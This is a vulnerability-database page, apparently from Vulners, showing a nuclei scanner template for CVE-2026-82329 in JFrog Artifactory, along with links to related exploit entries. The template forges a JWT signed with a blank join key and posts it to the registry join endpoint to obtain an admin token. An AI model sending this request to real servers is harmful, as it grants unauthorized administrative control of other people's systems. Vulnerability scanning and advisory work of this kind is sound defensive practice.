Lucene search
+L

JFrog Artifactory Access Blank Join Key Authentication Bypass

🗓️ 06 Sep 2026 02:04:30Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

JFrog Artifactory authentication bypass via blank JWT join key grants admin access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-82329
1 Sep 202606:15
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-82329
2 Sep 202606:52
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-82329
1 Sep 202614:17
githubexploit
githubexploit
GithubExploit
Exploit for Improper Authentication in Jfrog Artifactory
3 Sep 202616:58
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-82329
2 Sep 202620:14
githubexploit
githubexploit
GithubExploit
Exploit for Improper Authentication in Jfrog Artifactory
4 Sep 202608:43
githubexploit
circl
Circl
CVE-2026-82329
28 Aug 202622:01
circl
cisa_kev
CISA KEV Catalog
JFrog Artifactory Improper Authentication Vulnerability
2 Sep 202600:00
cisa_kev
cve
CVE
CVE-2026-82329
28 Aug 202618:27
cve
cvelist
Cvelist
CVE-2026-82329 Potential authentication bypass leading to administrative access in Artifactory
28 Aug 202618:27
cvelist
Rows per page
id: CVE-2026-82329

info:
  name: JFrog Artifactory Access Blank Join Key Authentication Bypass
  author: johnk3r,pruva
  severity: critical
  description: |
    JFrog Artifactory contains an authentication weakness that, under default configuration, may allow an unauthenticated attacker with network access to obtain administrative privileges.
  impact: |
    Unauthenticated attackers can gain administrative privileges, leading to full system control.
  remediation: |
    Update to the latest version and ensure secure configuration.
  reference:
    - https://jfrog.com/help/r/jfrog-release-information/artifactory-security-fixes
    - https://www.pruva.dev/reproductions/REPRO-2026-00341
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-82329
    epss-score: 0.07666
    epss-percentile: 0.94277
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"JFrog"
  tags: cve,cve2026,jfrog,auth-bypass,vkev,kev

variables:
  service_id: "jfrt@cve202682329nuclei{{rand_text_alpha(10)}}"
  node_id: "cve202682329node{{rand_text_alpha(10)}}"
  jwt_claims: '{"service_id":"{{service_id}}","node_id":"{{node_id}}","skip_node_registration":true,"iat":{{unix_time()}}000}'
  forged_jwt: '{{generate_jwt(jwt_claims,"HS256","                                ")}}'

http:
  - raw:
      - |
        POST /access/api/v1/registry/join HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain
        User-Agent: JFrogArtifactory/7.146.25
        Accept: */*
        Connection: close

        {{forged_jwt}}

    redirects: false
    max-redirects: 0

    matchers-condition: and

    matchers:
      - type: status
        status:
          - 201

      - type: word
        part: body
        words:
          - '"token"'
# digest: 4a0a0047304502203bb4d9588076ba0b603239457d47a8e77b1a7c6e7a0723b53fb97b5e952685e1022100caa055463c28407c7020ea8c0e9eac033cc60b4541fdac60db55c9a86002a59a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2026 16:08Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.07666
SSVC
9